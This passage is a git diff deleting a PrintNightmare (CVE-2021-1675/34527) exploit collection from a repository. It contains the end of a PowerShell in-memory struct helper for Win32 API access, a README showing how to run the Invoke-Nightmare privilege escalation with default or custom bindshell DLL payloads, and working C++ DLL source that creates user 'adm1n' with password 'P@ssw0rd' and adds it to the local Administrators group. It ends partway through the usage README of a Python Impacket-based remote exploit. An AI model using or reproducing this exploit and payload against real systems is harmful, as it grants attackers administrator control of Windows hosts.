-.SYNOPSIS
-Creates an in-memory struct for use in your PowerShell session.
-Author: Matthew Graeber (@mattifestation)
-License: BSD 3-Clause
-Required Dependencies: None
-Optional Dependencies: field
-.DESCRIPTION
-The 'struct' function facilitates the creation of structs entirely in
-memory using as close to a "C style" as PowerShell will allow. Struct
-fields are specified using a hashtable where each field of the struct
-is comprosed of the order in which it should be defined, its .NET
-type, and optionally, its offset and special marshaling attributes.
-One of the features of 'struct' is that after your struct is defined,
-it will come with a built-in GetSize method as well as an explicit
-converter so that you can easily cast an IntPtr to the struct without
-relying upon calling SizeOf and/or PtrToStructure in the Marshal
-class.
-.PARAMETER Module
-The in-memory module that will host the struct. Use
-New-InMemoryModule to define an in-memory module.
-.PARAMETER FullName
-The fully-qualified name of the struct.
-.PARAMETER StructFields
-A hashtable of fields. Use the 'field' helper function to ease
-defining each field.
-.PARAMETER PackingSize
-Specifies the memory alignment of fields.
-.PARAMETER ExplicitLayout
-Indicates that an explicit offset for each field will be specified.
-.EXAMPLE
-$Mod = New-InMemoryModule -ModuleName Win32
-$ImageDosSignature = psenum $Mod PE.IMAGE_DOS_SIGNATURE UInt16 @{
-    DOS_SIGNATURE =    0x5A4D
-    OS2_SIGNATURE =    0x454E
-    OS2_SIGNATURE_LE = 0x454C
-    VXD_SIGNATURE =    0x454C
-}
-$ImageDosHeader = struct $Mod PE.IMAGE_DOS_HEADER @{
-    e_magic =    field 0 $ImageDosSignature
-    e_cblp =     field 1 UInt16
-    e_cp =       field 2 UInt16
-    e_crlc =     field 3 UInt16
-    e_cparhdr =  field 4 UInt16
-    e_minalloc = field 5 UInt16
-    e_maxalloc = field 6 UInt16
-    e_ss =       field 7 UInt16
-    e_sp =       field 8 UInt16
-    e_csum =     field 9 UInt16
-    e_ip =       field 10 UInt16
-    e_cs =       field 11 UInt16
-    e_lfarlc =   field 12 UInt16
-    e_ovno =     field 13 UInt16
-    e_res =      field 14 UInt16[] -MarshalAs @('ByValArray', 4)
-    e_oemid =    field 15 UInt16
-    e_oeminfo =  field 16 UInt16
-    e_res2 =     field 17 UInt16[] -MarshalAs @('ByValArray', 10)
-    e_lfanew =   field 18 Int32
-}
-# Example of using an explicit layout in order to create a union.
-$TestUnion = struct $Mod TestUnion @{
-    field1 = field 0 UInt32 0
-    field2 = field 1 IntPtr 0
-} -ExplicitLayout
-.NOTES
-PowerShell purists may disagree with the naming of this function but
-again, this was developed in such a way so as to emulate a "C style"
-definition as closely as possible. Sorry, I'm not going to name it
-New-Struct. :P
-#>
-
-    [OutputType([Type])]
-    Param (
-        [Parameter(Position = 1, Mandatory=$True)]
-        [ValidateScript({($_ -is [Reflection.Emit.ModuleBuilder]) -or ($_ -is [Reflection.Assembly])})]
-        $Module,
-
-        [Parameter(Position = 2, Mandatory=$True)]
-        [ValidateNotNullOrEmpty()]
-        [String]
-        $FullName,
-
-        [Parameter(Position = 3, Mandatory=$True)]
-        [ValidateNotNullOrEmpty()]
-        [Hashtable]
-        $StructFields,
-
-        [Reflection.Emit.PackingSize]
-        $PackingSize = [Reflection.Emit.PackingSize]::Unspecified,
-
-        [Switch]
-        $ExplicitLayout
-    )
-
-    if ($Module -is [Reflection.Assembly])
-    {
-        return ($Module.GetType($FullName))
-    }
-
-    [Reflection.TypeAttributes] $StructAttributes = 'AnsiClass,
-        Class,
-        Public,
-        Sealed,
-        BeforeFieldInit'
-
-    if ($ExplicitLayout)
-    {
-        $StructAttributes = $StructAttributes -bor [Reflection.TypeAttributes]::ExplicitLayout
-    }
-    else
-    {
-        $StructAttributes = $StructAttributes -bor [Reflection.TypeAttributes]::SequentialLayout
-    }
-
-    $StructBuilder = $Module.DefineType($FullName, $StructAttributes, [ValueType], $PackingSize)
-    $ConstructorInfo = [Runtime.InteropServices.MarshalAsAttribute].GetConstructors()[0]
-    $SizeConst = @([Runtime.InteropServices.MarshalAsAttribute].GetField('SizeConst'))
-
-    $Fields = New-Object Hashtable[]($StructFields.Count)
-
-    # Sort each field according to the orders specified
-    # Unfortunately, PSv2 doesn't have the luxury of the
-    # hashtable [Ordered] accelerator.
-    foreach ($Field in $StructFields.Keys)
-    {
-        $Index = $StructFields[$Field]['Position']
-        $Fields[$Index] = @{FieldName = $Field; Properties = $StructFields[$Field]}
-    }
-
-    foreach ($Field in $Fields)
-    {
-        $FieldName = $Field['FieldName']
-        $FieldProp = $Field['Properties']
-
-        $Offset = $FieldProp['Offset']
-        $Type = $FieldProp['Type']
-        $MarshalAs = $FieldProp['MarshalAs']
-
-        $NewField = $StructBuilder.DefineField($FieldName, $Type, 'Public')
-
-        if ($MarshalAs)
-        {
-            $UnmanagedType = $MarshalAs[0] -as ([Runtime.InteropServices.UnmanagedType])
-            if ($MarshalAs[1])
-            {
-                $Size = $MarshalAs[1]
-                $AttribBuilder = New-Object Reflection.Emit.CustomAttributeBuilder($ConstructorInfo,
-                    $UnmanagedType, $SizeConst, @($Size))
-            }
-            else
-            {
-                $AttribBuilder = New-Object Reflection.Emit.CustomAttributeBuilder($ConstructorInfo, [Object[]] @($UnmanagedType))
-            }
-
-            $NewField.SetCustomAttribute($AttribBuilder)
-        }
-
-        if ($ExplicitLayout) { $NewField.SetOffset($Offset) }
-    }
-
-    # Make the struct aware of its own size.
-    # No more having to call [Runtime.InteropServices.Marshal]::SizeOf!
-    $SizeMethod = $StructBuilder.DefineMethod('GetSize',
-        'Public, Static',
-        [Int],
-        [Type[]] @())
-    $ILGenerator = $SizeMethod.GetILGenerator()
-    # Thanks for the help, Jason Shirk!
-    $ILGenerator.Emit([Reflection.Emit.OpCodes]::Ldtoken, $StructBuilder)
-    $ILGenerator.Emit([Reflection.Emit.OpCodes]::Call,
-        [Type].GetMethod('GetTypeFromHandle'))
-    $ILGenerator.Emit([Reflection.Emit.OpCodes]::Call,
-        [Runtime.InteropServices.Marshal].GetMethod('SizeOf', [Type[]] @([Type])))
-    $ILGenerator.Emit([Reflection.Emit.OpCodes]::Ret)
-
-    # Allow for explicit casting from an IntPtr
-    # No more having to call [Runtime.InteropServices.Marshal]::PtrToStructure!
-    $ImplicitConverter = $StructBuilder.DefineMethod('op_Implicit',
-        'PrivateScope, Public, Static, HideBySig, SpecialName',
-        $StructBuilder,
-        [Type[]] @([IntPtr]))
-    $ILGenerator2 = $ImplicitConverter.GetILGenerator()
-    $ILGenerator2.Emit([Reflection.Emit.OpCodes]::Nop)
-    $ILGenerator2.Emit([Reflection.Emit.OpCodes]::Ldarg_0)
-    $ILGenerator2.Emit([Reflection.Emit.OpCodes]::Ldtoken, $StructBuilder)
-    $ILGenerator2.Emit([Reflection.Emit.OpCodes]::Call,
-        [Type].GetMethod('GetTypeFromHandle'))
-    $ILGenerator2.Emit([Reflection.Emit.OpCodes]::Call,
-        [Runtime.InteropServices.Marshal].GetMethod('PtrToStructure', [Type[]] @([IntPtr], [Type])))
-    $ILGenerator2.Emit([Reflection.Emit.OpCodes]::Unbox_Any, $StructBuilder)
-    $ILGenerator2.Emit([Reflection.Emit.OpCodes]::Ret)
-
-    $StructBuilder.CreateType()
-}
diff --git a/exploit/windows/print_nightmare/CVE-2021-1675/README.md b/exploit/windows/print_nightmare/CVE-2021-1675/README.md
deleted file mode 100644
index a1bdddc..0000000
--- a/exploit/windows/print_nightmare/CVE-2021-1675/README.md
+++ /dev/null
@@ -1,40 +0,0 @@
-# CVE-2021-1675 - PrintNightmare LPE (PowerShell)
-
-> Caleb Stewart | John Hammond | July 1, 2021
-
-----------------------------------------------------------
-
-[CVE-2021-1675](https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-1675) is a critical remote code execution and local privilege escalation vulnerability dubbed "PrintNightmare."
-
-Proof-of-concept exploits have been released ([Python](https://github.com/cube0x0/CVE-2021-1675/blob/main/CVE-2021-1675.py), [C++](https://github.com/afwu/PrintNightmare/blob/main/EXP/POC/POC.cpp)) for the remote code execution capability, and a [C# rendition](https://github.com/cube0x0/CVE-2021-1675/tree/main/SharpPrintNightmare) for local privilege escalation. We had not seen a native implementation in pure PowerShell, and we wanted to try our hand at refining and recrafting the exploit.
-
-This PowerShell script performs local privilege escalation (LPE) with the PrintNightmare attack technique.
-
-![image](https://user-images.githubusercontent.com/6288722/124203761-70b36580-daab-11eb-8520-7d93743062af.png)
-
-This has been tested on Windows Server 2016 and Windows Server 2019.
-
-## Usage
-
-Add a new user to the local administrators group by default:
-
-```shell
-Import-Module .\cve-2021-1675.ps1
-Invoke-Nightmare # add user `adm1n`/`P@ssw0rd` in the local admin group by default
-
-Invoke-Nightmare -DriverName "Xerox" -NewUser "john" -NewPassword "SuperSecure" 
-```
-
-Supply a custom DLL payload, to do anything else you might like.
-
-```shell
-Import-Module .\cve-2021-1675.ps1
-Invoke-Nightmare -DLL "C:\absolute\path\to\your\bindshell.dll"
-```
-
-## Details
-
-* The LPE technique does not need to work with remote RPC or SMB, as it is only working with the functions of Print Spooler.
-* This script embeds a Base64-encoded GZIPped payload for a custom DLL, that is patched according to your arguments, to easily add a new user to the local administrators group.
-* This script embeds methods from PowerSploit/[PowerUp](https://github.com/PowerShellMafia/PowerSploit/blob/master/Privesc/PowerUp.ps1) to reflectively access the Win32 APIs.
-* This method does not loop through all printer drivers to find the appropriate DLL path -- it simply grabs the first driver and determines the appropriate path.
diff --git a/exploit/windows/print_nightmare/CVE-2021-1675/nightmare-dll/nightmare.sln b/exploit/windows/print_nightmare/CVE-2021-1675/nightmare-dll/nightmare.sln
deleted file mode 100644
index eed4db2..0000000
--- a/exploit/windows/print_nightmare/CVE-2021-1675/nightmare-dll/nightmare.sln
+++ /dev/null
@@ -1,31 +0,0 @@
-
-Microsoft Visual Studio Solution File, Format Version 12.00
-# Visual Studio Version 16
-VisualStudioVersion = 16.0.31402.337
-MinimumVisualStudioVersion = 10.0.40219.1
-Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "nightmare", "nightmare\nightmare.vcxproj", "{BBFBAF1D-A01E-4615-A208-786147320C20}"
-EndProject
-Global
-	GlobalSection(SolutionConfigurationPlatforms) = preSolution
-		Debug|x64 = Debug|x64
-		Debug|x86 = Debug|x86
-		Release|x64 = Release|x64
-		Release|x86 = Release|x86
-	EndGlobalSection
-	GlobalSection(ProjectConfigurationPlatforms) = postSolution
-		{BBFBAF1D-A01E-4615-A208-786147320C20}.Debug|x64.ActiveCfg = Debug|x64
-		{BBFBAF1D-A01E-4615-A208-786147320C20}.Debug|x64.Build.0 = Debug|x64
-		{BBFBAF1D-A01E-4615-A208-786147320C20}.Debug|x86.ActiveCfg = Debug|Win32
-		{BBFBAF1D-A01E-4615-A208-786147320C20}.Debug|x86.Build.0 = Debug|Win32
-		{BBFBAF1D-A01E-4615-A208-786147320C20}.Release|x64.ActiveCfg = Release|x64
-		{BBFBAF1D-A01E-4615-A208-786147320C20}.Release|x64.Build.0 = Release|x64
-		{BBFBAF1D-A01E-4615-A208-786147320C20}.Release|x86.ActiveCfg = Release|Win32
-		{BBFBAF1D-A01E-4615-A208-786147320C20}.Release|x86.Build.0 = Release|Win32
-	EndGlobalSection
-	GlobalSection(SolutionProperties) = preSolution
-		HideSolutionNode = FALSE
-	EndGlobalSection
-	GlobalSection(ExtensibilityGlobals) = postSolution
-		SolutionGuid = {30C87B43-BD46-4499-B9D4-11823A3D67C8}
-	EndGlobalSection
-EndGlobal
diff --git a/exploit/windows/print_nightmare/CVE-2021-1675/nightmare-dll/nightmare/dllmain.cpp b/exploit/windows/print_nightmare/CVE-2021-1675/nightmare-dll/nightmare/dllmain.cpp
deleted file mode 100644
index abb38d9..0000000
--- a/exploit/windows/print_nightmare/CVE-2021-1675/nightmare-dll/nightmare/dllmain.cpp
+++ /dev/null
@@ -1,32 +0,0 @@
-// dllmain.cpp : Defines the entry point for the DLL application.
-#include "pch.h"
-#include <Windows.h>
-#include <lm.h>
-#include <iostream>
-#include <fstream>
-
-#pragma comment(lib, "netapi32.lib")
-
-wchar_t username[256] = L"adm1n";
-wchar_t password[256] = L"P@ssw0rd";
-
-BOOL APIENTRY DllMain( HMODULE hModule,
-                       DWORD  ul_reason_for_call,
-                       LPVOID lpReserved
-                     )
-{
-    // Create the user
-    USER_INFO_1 user;
-    memset(&user, 0, sizeof(USER_INFO_1));
-    user.usri1_name = username;
-    user.usri1_password = password;
-    user.usri1_priv = USER_PRIV_USER;
-    user.usri1_flags = UF_DONT_EXPIRE_PASSWD;
-    NetUserAdd(NULL, 1, (LPBYTE)&user, NULL);
-
-    // Add the user to the administrators group
-    LOCALGROUP_MEMBERS_INFO_3 members;
-    members.lgrmi3_domainandname = username;
-    NetLocalGroupAddMembers(NULL, L"Administrators", 3, (LPBYTE)&members, 1);
-}
-
diff --git a/exploit/windows/print_nightmare/CVE-2021-1675/nightmare-dll/nightmare/framework.h b/exploit/windows/print_nightmare/CVE-2021-1675/nightmare-dll/nightmare/framework.h
deleted file mode 100644
index a9744f8..0000000
--- a/exploit/windows/print_nightmare/CVE-2021-1675/nightmare-dll/nightmare/framework.h
+++ /dev/null
@@ -1,5 +0,0 @@
-#pragma once
-
-#define WIN32_LEAN_AND_MEAN             // Exclude rarely-used stuff from Windows headers
-// Windows Header Files
-#include <windows.h>
diff --git a/exploit/windows/print_nightmare/CVE-2021-1675/nightmare-dll/nightmare/nightmare.vcxproj b/exploit/windows/print_nightmare/CVE-2021-1675/nightmare-dll/nightmare/nightmare.vcxproj
deleted file mode 100644
index a2789f0..0000000
--- a/exploit/windows/print_nightmare/CVE-2021-1675/nightmare-dll/nightmare/nightmare.vcxproj
+++ /dev/null
@@ -1,170 +0,0 @@
-<?xml version="1.0" encoding="utf-8"?>
-<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
-  <ItemGroup Label="ProjectConfigurations">
-    <ProjectConfiguration Include="Debug|Win32">
-      <Configuration>Debug</Configuration>
-      <Platform>Win32</Platform>
-    </ProjectConfiguration>
-    <ProjectConfiguration Include="Release|Win32">
-      <Configuration>Release</Configuration>
-      <Platform>Win32</Platform>
-    </ProjectConfiguration>
-    <ProjectConfiguration Include="Debug|x64">
-      <Configuration>Debug</Configuration>
-      <Platform>x64</Platform>
-    </ProjectConfiguration>
-    <ProjectConfiguration Include="Release|x64">
-      <Configuration>Release</Configuration>
-      <Platform>x64</Platform>
-    </ProjectConfiguration>
-  </ItemGroup>
-  <PropertyGroup Label="Globals">
-    <VCProjectVersion>16.0</VCProjectVersion>
-    <Keyword>Win32Proj</Keyword>
-    <ProjectGuid>{bbfbaf1d-a01e-4615-a208-786147320c20}</ProjectGuid>
-    <RootNamespace>nightmare</RootNamespace>
-    <WindowsTargetPlatformVersion>10.0</WindowsTargetPlatformVersion>
-  </PropertyGroup>
-  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
-    <ConfigurationType>DynamicLibrary</ConfigurationType>
-    <UseDebugLibraries>true</UseDebugLibraries>
-    <PlatformToolset>v142</PlatformToolset>
-    <CharacterSet>Unicode</CharacterSet>
-  </PropertyGroup>
-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
-    <ConfigurationType>DynamicLibrary</ConfigurationType>
-    <UseDebugLibraries>false</UseDebugLibraries>
-    <PlatformToolset>v142</PlatformToolset>
-    <WholeProgramOptimization>true</WholeProgramOptimization>
-    <CharacterSet>Unicode</CharacterSet>
-  </PropertyGroup>
-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
-    <ConfigurationType>DynamicLibrary</ConfigurationType>
-    <UseDebugLibraries>true</UseDebugLibraries>
-    <PlatformToolset>v142</PlatformToolset>
-    <CharacterSet>Unicode</CharacterSet>
-  </PropertyGroup>
-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
-    <ConfigurationType>DynamicLibrary</ConfigurationType>
-    <UseDebugLibraries>false</UseDebugLibraries>
-    <PlatformToolset>v142</PlatformToolset>
-    <WholeProgramOptimization>true</WholeProgramOptimization>
-    <CharacterSet>Unicode</CharacterSet>
-  </PropertyGroup>
-  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
-  <ImportGroup Label="ExtensionSettings">
-  </ImportGroup>
-  <ImportGroup Label="Shared">
-  </ImportGroup>
-  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
-    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
-  </ImportGroup>
-  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
-    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
-  </ImportGroup>
-  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
-    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
-  </ImportGroup>
-  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
-    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
-  </ImportGroup>
-  <PropertyGroup Label="UserMacros" />
-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
-    <LinkIncremental>true</LinkIncremental>
-  </PropertyGroup>
-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
-    <LinkIncremental>false</LinkIncremental>
-  </PropertyGroup>
-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
-    <LinkIncremental>true</LinkIncremental>
-  </PropertyGroup>
-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
-    <LinkIncremental>false</LinkIncremental>
-  </PropertyGroup>
-  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
-    <ClCompile>
-      <WarningLevel>Level3</WarningLevel>
-      <SDLCheck>true</SDLCheck>
-      <PreprocessorDefinitions>WIN32;_DEBUG;NIGHTMARE_EXPORTS;_WINDOWS;_USRDLL;%(PreprocessorDefinitions)</PreprocessorDefinitions>
-      <ConformanceMode>true</ConformanceMode>
-      <PrecompiledHeader>Use</PrecompiledHeader>
-      <PrecompiledHeaderFile>pch.h</PrecompiledHeaderFile>
-    </ClCompile>
-    <Link>
-      <SubSystem>Windows</SubSystem>
-      <GenerateDebugInformation>true</GenerateDebugInformation>
-      <EnableUAC>false</EnableUAC>
-    </Link>
-  </ItemDefinitionGroup>
-  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
-    <ClCompile>
-      <WarningLevel>Level3</WarningLevel>
-      <FunctionLevelLinking>true</FunctionLevelLinking>
-      <IntrinsicFunctions>true</IntrinsicFunctions>
-      <SDLCheck>true</SDLCheck>
-      <PreprocessorDefinitions>WIN32;NDEBUG;NIGHTMARE_EXPORTS;_WINDOWS;_USRDLL;%(PreprocessorDefinitions)</PreprocessorDefinitions>
-      <ConformanceMode>true</ConformanceMode>
-      <PrecompiledHeader>Use</PrecompiledHeader>
-      <PrecompiledHeaderFile>pch.h</PrecompiledHeaderFile>
-    </ClCompile>
-    <Link>
-      <SubSystem>Windows</SubSystem>
-      <EnableCOMDATFolding>true</EnableCOMDATFolding>
-      <OptimizeReferences>true</OptimizeReferences>
-      <GenerateDebugInformation>true</GenerateDebugInformation>
-      <EnableUAC>false</EnableUAC>
-    </Link>
-  </ItemDefinitionGroup>
-  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
-    <ClCompile>
-      <WarningLevel>Level3</WarningLevel>
-      <SDLCheck>true</SDLCheck>
-      <PreprocessorDefinitions>_DEBUG;NIGHTMARE_EXPORTS;_WINDOWS;_USRDLL;%(PreprocessorDefinitions)</PreprocessorDefinitions>
-      <ConformanceMode>true</ConformanceMode>
-      <PrecompiledHeader>Use</PrecompiledHeader>
-      <PrecompiledHeaderFile>pch.h</PrecompiledHeaderFile>
-    </ClCompile>
-    <Link>
-      <SubSystem>Windows</SubSystem>
-      <GenerateDebugInformation>true</GenerateDebugInformation>
-      <EnableUAC>false</EnableUAC>
-    </Link>
-  </ItemDefinitionGroup>
-  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
-    <ClCompile>
-      <WarningLevel>Level3</WarningLevel>
-      <FunctionLevelLinking>true</FunctionLevelLinking>
-      <IntrinsicFunctions>true</IntrinsicFunctions>
-      <SDLCheck>true</SDLCheck>
-      <PreprocessorDefinitions>NDEBUG;NIGHTMARE_EXPORTS;_WINDOWS;_USRDLL;%(PreprocessorDefinitions)</PreprocessorDefinitions>
-      <ConformanceMode>true</ConformanceMode>
-      <PrecompiledHeader>Use</PrecompiledHeader>
-      <PrecompiledHeaderFile>pch.h</PrecompiledHeaderFile>
-      <RuntimeLibrary>MultiThreaded</RuntimeLibrary>
-    </ClCompile>
-    <Link>
-      <SubSystem>Windows</SubSystem>
-      <EnableCOMDATFolding>true</EnableCOMDATFolding>
-      <OptimizeReferences>true</OptimizeReferences>
-      <GenerateDebugInformation>true</GenerateDebugInformation>
-      <EnableUAC>false</EnableUAC>
-    </Link>
-  </ItemDefinitionGroup>
-  <ItemGroup>
-    <ClInclude Include="framework.h" />
-    <ClInclude Include="pch.h" />
-  </ItemGroup>
-  <ItemGroup>
-    <ClCompile Include="dllmain.cpp" />
-    <ClCompile Include="pch.cpp">
-      <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">Create</PrecompiledHeader>
-      <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">Create</PrecompiledHeader>
-      <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">Create</PrecompiledHeader>
-      <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|x64'">Create</PrecompiledHeader>
-    </ClCompile>
-  </ItemGroup>
-  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
-  <ImportGroup Label="ExtensionTargets">
-  </ImportGroup>
-</Project>
\ No newline at end of file
diff --git a/exploit/windows/print_nightmare/CVE-2021-1675/nightmare-dll/nightmare/nightmare.vcxproj.filters b/exploit/windows/print_nightmare/CVE-2021-1675/nightmare-dll/nightmare/nightmare.vcxproj.filters
deleted file mode 100644
index f99bb48..0000000
--- a/exploit/windows/print_nightmare/CVE-2021-1675/nightmare-dll/nightmare/nightmare.vcxproj.filters
+++ /dev/null
@@ -1,33 +0,0 @@
-<?xml version="1.0" encoding="utf-8"?>
-<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
-  <ItemGroup>
-    <Filter Include="Source Files">
-      <UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
-      <Extensions>cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
-    </Filter>
-    <Filter Include="Header Files">
-      <UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
-      <Extensions>h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd</Extensions>
-    </Filter>
-    <Filter Include="Resource Files">
-      <UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
-      <Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>
-    </Filter>
-  </ItemGroup>
-  <ItemGroup>
-    <ClInclude Include="framework.h">
-      <Filter>Header Files</Filter>
-    </ClInclude>
-    <ClInclude Include="pch.h">
-      <Filter>Header Files</Filter>
-    </ClInclude>
-  </ItemGroup>
-  <ItemGroup>
-    <ClCompile Include="dllmain.cpp">
-      <Filter>Source Files</Filter>
-    </ClCompile>
-    <ClCompile Include="pch.cpp">
-      <Filter>Source Files</Filter>
-    </ClCompile>
-  </ItemGroup>
-</Project>
\ No newline at end of file
diff --git a/exploit/windows/print_nightmare/CVE-2021-1675/nightmare-dll/nightmare/nightmare.vcxproj.user b/exploit/windows/print_nightmare/CVE-2021-1675/nightmare-dll/nightmare/nightmare.vcxproj.user
deleted file mode 100644
index 0f14913..0000000
--- a/exploit/windows/print_nightmare/CVE-2021-1675/nightmare-dll/nightmare/nightmare.vcxproj.user
+++ /dev/null
@@ -1,4 +0,0 @@
-<?xml version="1.0" encoding="utf-8"?>
-<Project ToolsVersion="Current" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
-  <PropertyGroup />
-</Project>
\ No newline at end of file
diff --git a/exploit/windows/print_nightmare/CVE-2021-1675/nightmare-dll/nightmare/pch.cpp b/exploit/windows/print_nightmare/CVE-2021-1675/nightmare-dll/nightmare/pch.cpp
deleted file mode 100644
index 91c22df..0000000
--- a/exploit/windows/print_nightmare/CVE-2021-1675/nightmare-dll/nightmare/pch.cpp
+++ /dev/null
@@ -1,5 +0,0 @@
-// pch.cpp: source file corresponding to the pre-compiled header
-
-#include "pch.h"
-
-// When you are using pre-compiled headers, this source file is necessary for compilation to succeed.
diff --git a/exploit/windows/print_nightmare/CVE-2021-1675/nightmare-dll/nightmare/pch.h b/exploit/windows/print_nightmare/CVE-2021-1675/nightmare-dll/nightmare/pch.h
deleted file mode 100644
index 04ff4c2..0000000
--- a/exploit/windows/print_nightmare/CVE-2021-1675/nightmare-dll/nightmare/pch.h
+++ /dev/null
@@ -1,13 +0,0 @@
-// pch.h: This is a precompiled header file.
-// Files listed below are compiled only once, improving build performance for future builds.
-// This also affects IntelliSense performance, including code completion and many code browsing features.
-// However, files listed here are ALL re-compiled if any one of them is updated between builds.
-// Do not add files here that you will be updating frequently as this negates the performance advantage.
-
-#ifndef PCH_H
-#define PCH_H
-
-// add headers that you want to pre-compile here
-#include "framework.h"
-
-#endif //PCH_H
diff --git a/exploit/windows/print_nightmare/PrintNightmare/LICENSE b/exploit/windows/print_nightmare/PrintNightmare/LICENSE
deleted file mode 100644
index 192d83a..0000000
--- a/exploit/windows/print_nightmare/PrintNightmare/LICENSE
+++ /dev/null
@@ -1,21 +0,0 @@
-MIT License
-
-Copyright (c) 2021 ly4k
-
-Permission is hereby granted, free of charge, to any person obtaining a copy
-of this software and associated documentation files (the "Software"), to deal
-in the Software without restriction, including without limitation the rights
-to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
-copies of the Software, and to permit persons to whom the Software is
-furnished to do so, subject to the following conditions:
-
-The above copyright notice and this permission notice shall be included in all
-copies or substantial portions of the Software.
-
-THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
-IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
-FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
-AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
-LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
-OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
-SOFTWARE.
diff --git a/exploit/windows/print_nightmare/PrintNightmare/README.md b/exploit/windows/print_nightmare/PrintNightmare/README.md
deleted file mode 100644
index adf83ab..0000000
--- a/exploit/windows/print_nightmare/PrintNightmare/README.md
+++ /dev/null
@@ -1,260 +0,0 @@
-# PrintNightmare
-
-Python implementation for PrintNightmare (CVE-2021-1675 / CVE-2021-34527) using standard Impacket.
-
-## Installtion
-
-```bash
-$ pip3 install impacket
-```
-
-## Usage
-
-```
-Impacket v0.9.23 - Copyright 2021 SecureAuth Corporation
-
-usage: printnightmare.py [-h] [-debug] [-port [destination port]] [-target-ip ip address] [-hashes LMHASH:NTHASH] [-no-pass] [-k] [-dc-ip ip address]
-                         [-name driver name] [-env driver name] [-path driver path] [-dll driver dll] [-check] [-list] [-delete]
-                         target
-
-PrintNightmare (CVE-2021-1675 / CVE-2021-34527)
-
-positional arguments:
-  target                [[domain/]username[:password]@]<targetName or address>
-
-optional arguments:
-  -h, --help            show this help message and exit
-  -debug                Turn DEBUG output ON
-  -no-pass              don't ask for password (useful for -k)
-  -k                    Use Kerberos authentication. Grabs credentials from ccache file (KRB5CCNAME) based on target parameters. If valid credentials
-                        cannot be found, it will use the ones specified in the command line
-  -dc-ip ip address     IP Address of the domain controller. If omitted it will use the domain part (FQDN) specified in the target parameter
-
-connection:
-  -port [destination port]
-                        Destination port to connect to MS-RPRN named pipe
-  -target-ip ip address
-                        IP Address of the target machine. If ommited it will use whatever was specified as target. This is useful when target is the
-                        NetBIOS name and you cannot resolve it
-
-authentication:
-  -hashes LMHASH:NTHASH
-                        NTLM hashes, format is LMHASH:NTHASH
-
-driver:
-  -name driver name     Name for driver
-  -env driver name      Environment for driver
-  -path driver path     Driver path for driver
-  -dll driver dll       Path to DLL
-
-modes:
-  -check                Check if target is vulnerable
-  -list                 List existing printer drivers
-  -delete               Deletes printer driver
-```
-
-### Examples
-
-#### Exploitation
-
-##### Remote DLL
-```bash
